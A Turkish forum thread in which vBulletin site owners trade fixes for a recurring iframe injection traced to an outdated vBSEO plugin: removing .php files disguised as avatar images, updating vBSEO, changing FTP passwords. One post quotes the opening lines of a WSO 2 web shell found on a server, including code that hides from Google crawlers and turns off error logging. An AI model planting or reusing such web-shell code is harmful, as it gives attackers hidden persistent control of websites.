IFRAME Var Sitemde, Yardımcı Olabilecek?

Bilgisayarıma format atalı iki gün oldu ve Karspersk 2010 yükledim. Eğer bilgisayarımda olsaydı bu virüs mutlaka uyarı verirdi çünkü siteye girince uyarı veriyor. Bilgisayarıma çekince dosyayı yine uyarı veriyor ve dosyaları temizleyip tekrar yüklüyorum temiz görünüyor daha sonra üzerinee silinmiş dosyaları full tamamlıyorum temiz dosyalardan aradan 5 dakika geçiyor yine aynı uyarı geliyor.

Neyse bu akşam host değişiyorum sıfır VB kurup üzerine yazdıracam DB'yi umarım düzelir.

virüs header templatesine bulaşıyor.
Customeprofilepics
signaturepics
gibi kullanıcıların bişeyler yükleyebildiği klasörleri kontrol edip .php uzantılı olanları silin.
Sorun vbseodan kaynaklı. Son sürümüne güncellemeniz gerekiyor.
Tüm bunları yaparsanız bir daha girmez.
2 sitesinde aynı sorunu yaşayıp kalıcı olarak çözmüş birisi olarak yazıyorum

Kralask açıklamanız için teşekkür ederim.
bende de centiyo virüsü habire headere yapışıp duruyor,
can sıkıcı bişey. dosyaları bu akşam indirip deneyeceğim.
ancak vbseoyu 2 ay önce güncellemiştim bir arkadaş sayesinde.

vbulletin 3.8.x kullanıyorsanız vBSEO 3.3.2 yi indirip şuanki sürümünüzü upgrade etmelisiniz. Fakat söylediğim gibi bahsettiğim klasörlerin içine girip .php uzantılı dosyaları silin. Shell vardır mutlaka o klasörlerden birinde. Normal .gif uzantılı dosyalardan birinin ismiyle aynı oluyor sadece uzantısı .php oluyor.

customavatars klasöründe profilepic60335_1.php dosyasını buldum sanırım haklısınız shell var

Kodların bir kısmı;

<?php
/**
 * WSO 2
 * Web Shell by oRb
 */
#$auth_pass = "63a9f0ea7bb98050764fd49e85481845";
$color = "#df5";
$default_action = 'FilesMan';
@define('SELF_PATH', __FILE__);


if( strpos($_SERVER['HTTP_USER_AGENT'],'Google') !== false ) {
	header('HTTP/1.0 404 Not Found');
	exit;
}
@session_start();
@error_reporting(0);
@ini_set('error_log',NULL);
@ini_set('log_errors',0);
@ini_set('max_execution_time',0);
@set_time_limit(0);
@set_magic_quotes_runtime(0);
@define('VERSION', '2.2');
if( get_magic_quotes_gpc() ) {
	function stripslashes_array($array) {
		return is_array($array) ? array_map('stripslashes_array', $array) : stripslashes($array);
	}
	$_POST = stripslashes_array($_POST);

vbseo güncellemediğiniz sürecede hergün düzenli olarak shell atıyolar, tecrübeyle sabittir

Şimdi güncelledim vbseoyu umarım bir daha bulaşmaz iki üç gündür sabah kalktığımda ilk işim iframeleri silmekti.

Bişey daha soracağım.

Cpanelden aratırdığımda
şöyle bir sonuca ulaşıyordum;
/public_html/customavatars/profilepic60335_1.php
/home/hebun/public_html/customavatars/profilepic60335_1.php

Dosyayı sildiğimde tekrar arama yaptım çıkan arama sonucu bu;
/home/hebun/public_html/customavatars/profilepic60335_1.php

klasöre girdiğimde profilepic60335_1.php dosyası yok

Son sürüm yerine mesela 3.3.0 kullanılıyorsa yayınlanan yamalar uygulanırsa onlarda açığı kapatıyor sanırım. Yanlışsam düzeltiniz.

ifframe virüsü index.php ve index.hmtl olan butun dosyalara bulaşır benim başıma geldiginde uyguladgım işlem önce ftp mi sildim daha sonra pc me format attım vbulletin dosyalarımı temız olanlarıyla degiştirdim+kullandıgım eklentilerinde çünkü bnlardada index.php.ve html var ftp şifremi degiştirdim ve gönderdim dosyaları bıdaha bu sorun cıkmadıbu arada cuteftp kullanıyor olabilirsin filezillayı öneriyorum birdaha başına gelmez